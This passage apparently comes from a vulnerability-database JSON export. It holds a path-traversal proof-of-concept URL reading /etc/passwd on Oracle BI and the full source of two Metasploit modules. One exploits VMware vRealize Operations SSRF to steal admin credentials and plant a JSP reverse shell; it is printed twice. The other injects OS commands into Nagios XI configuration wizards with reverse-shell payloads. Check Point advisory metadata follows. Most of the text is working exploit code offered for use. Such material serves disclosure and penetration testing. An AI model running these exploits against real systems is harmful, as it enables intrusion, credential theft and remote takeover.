CVE: CVE-2020-14864 \n \n# Description \nA Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files. 
\n \n# PoC \nhttps://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd \n`\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/159748/oraclebiee-traversallfi.txt"}, {"lastseen": "2021-04-27T15:49:39", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write (CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. \n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. 
\n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 
\nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt"}], "metasploit": [{"lastseen": "2023-05-27T15:13:13", "description": "This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. 
This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-07T20:18:03", "type": "metasploit", "title": "Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2023-04-01T08:58:37", "id": "MSF:EXPLOIT-LINUX-HTTP-NAGIOS_XI_CONFIGWIZARDS_AUTHENTICATED_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::NagiosXi\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards 
Authenticated Remote Code Exection',\n 'Description' => %q{\n This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are\n OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm\n configuration wizards that allow an authenticated user to perform remote code\n execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.\n\n Valid credentials for a Nagios XI user are required. This module has\n been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Matthew Mathur'\n ],\n 'References' => [\n ['CVE', '2021-25296'],\n ['CVE', '2021-25297'],\n ['CVE', '2021-25298'],\n ['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']\n ],\n 'Platform' => %w[linux unix],\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'Targets' => [\n [\n 'Linux (x86)', {\n 'Arch' => [ ARCH_X86 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'CMD', {\n 'Arch' => [ ARCH_CMD ],\n 'Platform' => 'unix',\n # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 2,\n 'DisclosureDate' => '2021-02-13',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options [\n OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])\n ]\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def 
finish_install\n datastore['FINISH_INSTALL']\n end\n\n def check\n # Authenticate to ensure we can access the NagiosXI version\n auth_result, err_msg, @auth_cookies, @version, @nsp = authenticate(username, password, finish_install, true, true, true)\n case auth_result\n when AUTH_RESULTS[:connection_failed]\n return CheckCode::Unknown(err_msg)\n when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]\n return CheckCode::Detected(err_msg)\n when AUTH_RESULTS[:not_nagios_application]\n return CheckCode::Safe(err_msg)\n end\n\n if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')\n return CheckCode::Appears\n end\n\n return CheckCode::Safe\n end\n\n def execute_command(cmd, _opts = {})\n if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check\n auth_result, err_msg, @auth_cookies, @version, @nsp = authenticate(username, password, finish_install, true, true, true)\n case auth_result\n when AUTH_RESULTS[:connection_failed]\n return CheckCode::Unknown(err_msg)\n when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]\n return CheckCode::Detected(err_msg)\n when AUTH_RESULTS[:not_nagios_application]\n return CheckCode::Safe(err_msg)\n end\n end\n\n # execute payload based on the selected targeted configuration wizard\n url_params = {\n 'update' => 1,\n 'nsp' => @nsp\n }\n # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298\n # changes from address to ip_address\n if @version <= Rex::Version.new('5.5.7')\n address_param = 'address'\n else\n address_param = 'ip_address'\n end\n\n # CVE-2021-25296 affects the windowswmi configuration wizard.\n if datastore['TARGET_CVE'] == 'CVE-2021-25296'\n 
url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'windowswmi',\n 'ip_address' => Array.new(4) { rand(256) }.join('.'),\n 'domain' => Rex::Text.rand_text_alphanumeric(7..15),\n 'username' => Rex::Text.rand_text_alphanumeric(7..20),\n 'password' => Rex::Text.rand_text_alphanumeric(7..20),\n 'plugin_output_len' => Rex::Text.rand_text_numeric(5) + \"; #{cmd};\"\n })\n # CVE-2021-25297 affects the switch configuration wizard.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'\n url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'switch',\n address_param => Array.new(4) { rand(256) }.join('.') + \"\\\"; #{cmd};\",\n 'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),\n 'scaninterfaces' => 'on'\n })\n # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by\n # specifying the digitalocean option for the wizard parameter.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'\n url_params = url_params.merge({\n address_param => Array.new(4) { rand(256) }.join('.') + \"; #{cmd};\",\n 'nextstep' => 4,\n 'wizard' => 'digitalocean'\n })\n else\n fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')\n end\n\n print_status('Sending the payload...')\n # Send the final request. Note that the target is not expected to respond if we get\n # code execution. 
Therefore, we set the timeout on this request to 0.\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/nagiosxi/config/monitoringwizard.php',\n 'cookie' => @auth_cookies,\n 'vars_get' => url_params\n })\n end\n\n def exploit\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded)\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:04", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. 
Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write 
(CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n 
fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:08", "description": "A remote code execution vulnerability exists in Nagios XI. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "checkpoint_advisories", "title": "Nagios XI Remote Code Execution (CVE-2021-25296; CVE-2021-25297; CVE-2021-25298; CVE-2021-25299)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0085", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:30:11", "description": "A command injection vulnerability exists in Apache Airflow. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Apache Airflow Command Injection (CVE-2020-11978; CVE-2020-13927)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2022-01-31T00:00:00", "id": "CPAI-2020-3368", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:53", "description": "A directory traversal vulnerability exists in Aviatrix Controller. 
Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-30T00:00:00", "type": "checkpoint_advisories", "title": "Aviatrix Controller Directory Traversal (CVE-2021-40870)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-12-30T00:00:00", "id": "CPAI-2021-0951", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:28", "description": "An authentication bypass vulnerability exists in October CMS. 
Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2022-02-02T00:00:00", "type": "checkpoint_advisories", "title": "October CMS Authentication Bypass (CVE-2021-32648)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-02-02T00:00:00", "id": "CPAI-2021-1061", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-02-18T07:32:18", "description": "A buffer overflow vulnerability exists in F5 BIG-IP. 
